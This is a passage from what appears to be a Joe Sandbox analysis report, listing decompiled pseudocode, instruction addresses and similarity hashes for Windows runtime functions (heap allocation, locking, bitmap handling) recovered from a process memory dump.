						E037EBB2D(_t16, _t15);
						E037EB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E037DFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E037DFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E037DFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x037ec18d
0x037ec18f
0x037ec191
0x037ec19b
0x037ec1a0
0x037ec1d4
0x037ec1de
0x03832d6e
0x037ec1e4
0x037ec1e4
0x037ec1e4
0x037ec1ec
0x03832d7d
0x03832d7d
0x037ec1f3
0x037ec1ff
0x03832d88
0x03832d8d
0x03832d94
0x03832d94
0x03832d9f
0x03832da4
0x03832dab
0x03832db0
0x03832db2
0x03832db3
0x03832db4
0x03832dbc
0x03832dc3
0x03832dc3
0x037ec205
0x037ec205
0x037ec208
0x037ec20e
0x037ec211
0x037ec216
0x037ec219
0x037ec21f
0x037ec222
0x037ec22c
0x037ec234
0x037ec23a
0x037ec23f
0x037ec245
0x037ec24b
0x037ec251
0x037ec25a
0x037ec276
0x037ec27d
0x037ec27d
0x037ec25c
0x037ec25c
0x00000000
0x037ec25e
0x037ec1a4
0x037ec1aa
0x037ec1b3
0x037ec265
0x037ec26c
0x037ec26c
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 2263e8e6cc5d185eca40aeb77a7178952d6595e5fb2b05c77819a76c452de8d1
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: 1D31097A60168BFED705EBF4C484BE9FB68BF4A204F08419AD41C9F301DB345955DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 03847016 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E03847016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x38bd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E03846B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E03846B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E037E7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E03809AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0380B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L037E4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x03847016
0x0384701e
0x0384702b
0x03847033
0x03847037
0x0384703c
0x0384703e
0x03847041
0x03847045
0x0384704a
0x03847050
0x03847055
0x0384705a
0x03847062
0x03847062
0x0384705a
0x03847064
0x03847064
0x03847067
0x03847071
0x03847096
0x0384709b
0x038470a2
0x038470a6
0x038470a7
0x038470ad
0x038470b3
0x038470b6
0x038470bb
0x038470c3
0x038470c3
0x038470c6
0x038470cd
0x038470dd
0x038470e0
0x038470e2
0x038470e2
0x038470ee
0x03847101
0x038470f0
0x038470f9
0x038470f9
0x0384710a
0x0384710e
0x03847112
0x03847117
0x03847118
0x03847118
0x038470bb
0x0384711d
0x03847123
0x03847131
0x03847131
0x03847136
0x0384713d
0x0384713e
0x0384713f
0x0384714a
0x0384714a
0x03847084
0x03847088
0x00000000
0x0384708e
0x0384708e
0x03847092
0x00000000
0x03847092

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15e9f13583de2888891cdc7c16c2d1a1fedf6b3bb372310cce9023bbbdc72f1c
Instruction ID: d76fe26116e1f366d644e65d00e5a28ef169cfe62e32550c9188fe91c5934238
Opcode Fuzzy Hash: 15e9f13583de2888891cdc7c16c2d1a1fedf6b3bb372310cce9023bbbdc72f1c
Instruction Fuzzy Hash: 7931C6766047959BC321DF68CC40A6AB3E5FFC8700F044A69F8A5DBA90E730E904C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 037FA70E Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E037FA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x38b7b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x38b7b10 = 8;
					 *0x38b7b14 = 0x38b7b0c;
					 *0x38b7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E037FA990(0x38b7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L037FA840(__edx, __ecx, __ecx, _t52, 0x38b7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x38b7b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x38b7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x38b7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L037E4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x38b7b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E0380F3E0(_t50,  *0x38b7b14, _t8 >> 3);
						_t28 =  *0x38b7b14; // 0x77de7b0c
						__eflags = _t28 - 0x38b7b0c;
						if(_t28 != 0x38b7b0c) {
							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x38b7b14 = _t50;
						_t48 = _v12;
						 *0x38b7b10 = _t9;
						goto L6;
					}
					 *0x38b7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x037fa713
0x037fa714
0x037fa717
0x037fa71d
0x037fa720
0x037fa722
0x037fa727
0x037fa74a
0x037fa754
0x037fa75e
0x037fa768
0x037fa76a
0x037fa773
0x037fa78b
0x037fa790
0x037fa792
0x037fa741
0x037fa741
0x037fa743
0x037fa749
0x037fa749
0x037fa732
0x037fa73a
0x037fa797
0x037fa79d
0x037fa7a3
0x037fa7a9
0x037fa7b6
0x037fa7bc
0x037fa7ca
0x037fa7e0
0x037fa7e2
0x037fa7e4
0x03839bf2
0x00000000
0x03839bf2
0x037fa7ed
0x037fa7f2
0x037fa800
0x037fa805
0x037fa80d
0x037fa812
0x03839c08
0x03839c08
0x037fa818
0x037fa81b
0x037fa821
0x037fa824
0x00000000
0x037fa824
0x037fa7ae
0x00000000
0x037fa7ae
0x037fa73c
0x037fa73e
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0222bae3e8ea7485af6959b7dfe75818a591ecd6f98454ed270413c2b99ff552
Instruction ID: 8e4df87aed097bc7de646d27d3608eb63461127e7b03358e4748a76c0a6006fd
Opcode Fuzzy Hash: 0222bae3e8ea7485af6959b7dfe75818a591ecd6f98454ed270413c2b99ff552
Instruction Fuzzy Hash: 54319AB16207029FCB15DB58D881F6AB7B9FB85610F14099AF109DB744E3B0A901CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 037CAA16 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E037CAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x38bd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x38b7b9c; // 0x0
					_t53 = L037E4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0380B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0380F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L037D6C59(_t53, _t51, _t58) != 0) {
							_t28 = E037F5E50(0x37ac338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E037FB230(_v32, _v28, 0x37ac2d8, 1,  &_v24);
								_t28 = E037CF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x037caa25
0x037caa29
0x037caa2d
0x037caa30
0x037caa37
0x037caa3c
0x03824458
0x03824458
0x03824472
0x03824474
0x03824476
0x037caa64
0x037caa74
0x0382447c
0x03824483
0x03824492
0x037caa52
0x037caa54
0x037caa5e
0x038244a8
0x038244ad
0x038244af
0x038244b6
0x038244b6
0x038244b9
0x038244bc
0x038244cd
0x038244d3
0x038244d6
0x038244e1
0x038244e1
0x038244e6
0x038244e8
0x038244fb
0x038244fb
0x038244e8
0x00000000
0x037caa5e
0x03824476
0x037caa42
0x037caa46
0x037caa48
0x037caa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 993d2c16da7d0b5c871e5965951816b07d056f7e80ee98fc7acf06dd8ff1ba16
Instruction ID: 56842be877eed62d071835ef129e4800b61c9ca83c2a7f2ab1ec7653fd6bf412
Opcode Fuzzy Hash: 993d2c16da7d0b5c871e5965951816b07d056f7e80ee98fc7acf06dd8ff1ba16
Instruction Fuzzy Hash: 7331C271A00669AFCF15DFA5CD81A7EB7B8EF44700B0540ADF901EB240E7749A50DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 037F61A0 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E037F61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E037F5E50(0x37a67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E03899D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E037CF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x037f61b3
0x037f61b5
0x037f61bd
0x037f61c3
0x037f61c7
0x037f61d2
0x037f61ff
0x037f61ff
0x037f6201
0x037f6207
0x037f6207
0x037f61d4
0x037f61d9
0x00000000
0x00000000
0x037f61df
0x037f61e2
0x00000000
0x00000000
0x037f61e6
0x037f61e8
0x037f61ee
0x037f61ee
0x037f61f9
0x0383762f
0x03837632
0x03837635
0x03837639
0x03837640
0x0383766e
0x03837675
0x00000000
0x00000000
0x03837681
0x03837689
0x0383768d
0x03837691
0x03837695
0x03837699
0x038376af
0x038376b5
0x038376b7
0x038376b7
0x038376d7
0x038376dc
0x00000000
0x038376dc
0x038376a2
0x038376a9
0x03837651
0x03837653
0x03837653
0x03837656
0x03837656
0x00000000
0x03837656
0x03837644
0x03837646
0x03837648
0x03837648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea89dfb1a43c017634042acc9a821f0330da8f4f7841c21c283a18e67bf11730
Instruction ID: e7e1f4ab93d7d1e22708d15731eb661e778c5174814f1eba14607f84c2bf4b4f
Opcode Fuzzy Hash: ea89dfb1a43c017634042acc9a821f0330da8f4f7841c21c283a18e67bf11730
Instruction Fuzzy Hash: C43157B16057018FD360DF59C850B2AF7E5BB88B10F0949ADFAA8DB351E7B0E804CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03808EC7 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E03808EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x38bd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E037F4E70(0x38b86e4, 0x3809490, 0, 0);
					if( *0x38b53e8 > 5 && E03808F33(0x38b53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x38b53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x38b53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x37abc46;
						_t48 = E03847B9C(0x38b53e8, 0x37abc46, _t67, 0x38b53e8, _t70,  &_v140);
					}
				}
				return E0380B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x03808ec7
0x03808ed9
0x03808edc
0x03808ee6
0x03808ee9
0x03808eee
0x03808efc
0x03808f08
0x03841349
0x03841353
0x0384135d
0x03841366
0x0384136f
0x03841375
0x0384137c
0x03841385
0x03841390
0x03841391
0x0384139c
0x0384139d
0x038413a6
0x038413ac
0x038413b2
0x038413b5
0x038413bc
0x038413bf
0x038413c2
0x038413c5
0x038413c8
0x038413cb
0x038413ce
0x038413d1
0x038413d4
0x038413d7
0x038413da
0x038413dd
0x038413e0
0x038413e3
0x038413e6
0x038413e9
0x038413f6
0x03841400
0x03841400
0x03808f08
0x03808f32

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3fa09895110660ec9a67ae60bc9d10c5b3d97446b21fcc5a5127ff0c6c256cc
Instruction ID: c7502e23662e2c6db9497a039b6b1a11d5e05ca45b6808cf89ce5ea92fe9dc97
Opcode Fuzzy Hash: b3fa09895110660ec9a67ae60bc9d10c5b3d97446b21fcc5a5127ff0c6c256cc
Instruction Fuzzy Hash: 28419DB1D007189FDB60CFAAD981AADFBF8BB49310F5041AEE519E7240E7745A84CF60

Uniqueness

Uniqueness Score: -1.00%

Function 03804A2C Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E03804A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x38bd360 ^ _t62;
				_v8 =  *0x38bd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E037E2280(_t26, 0x38b8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E037DFFB0(_t41, _t51, 0x38b8608);
						L2:
						 *0x38bb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0380B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E037E2280(_t28, 0x38b8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E037DFFB0(_t42, _t53, 0x38b8608);
							if(_t53 != 0) {
								L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E037DFFB0(_t41, _t51, 0x38b8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x03804a2c
0x03804a34
0x03804a3c
0x03804a3e
0x03804a48
0x03804a4b
0x03804a4d
0x03804a51
0x03804a9c
0x00000000
0x00000000
0x03804aa3
0x03804aa8
0x03804aad
0x03804ab1
0x03804ade
0x03804ae3
0x03804a5a
0x03804a62
0x03804a6a
0x03804a6e
0x0383f203
0x03804a84
0x03804a88
0x03804a89
0x03804a8a
0x03804a95
0x03804a95
0x03804a79
0x03804a80
0x03804af2
0x03804af4
0x03804af9
0x03804aff
0x03804b01
0x03804b03
0x03804b08
0x0383f20a
0x0383f212
0x0383f216
0x0383f216
0x03804b08
0x03804b13
0x03804b1a
0x0383f229
0x0383f229
0x03804b1a
0x03804a82
0x00000000
0x03804a82
0x03804ab7
0x03804acd
0x03804acd
0x03804ad5
0x03804ada
0x00000000
0x03804ada
0x03804ac2
0x03804acb
0x00000000
0x00000000
0x00000000
0x03804acb
0x03804a53
0x03804a53
0x03804a58
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deeb71ff9302858e680caf93afb6df65ea70bc93c3226ae34d093d9b04d4493c
Instruction ID: e35f089c66c4dbaa1c46973ba6158671477f41a920b22a71519b4a8fd2063715
Opcode Fuzzy Hash: deeb71ff9302858e680caf93afb6df65ea70bc93c3226ae34d093d9b04d4493c
Instruction Fuzzy Hash: 25312332245345DFC761EF95CD89B2ABBA8FF85614F1804E9EA229B291C770D800CF85

Uniqueness

Uniqueness Score: -1.00%

Function 037FE730 Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E037FE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E03809670() < 0) {
					L0381DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x38b7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L037E4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M037FE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
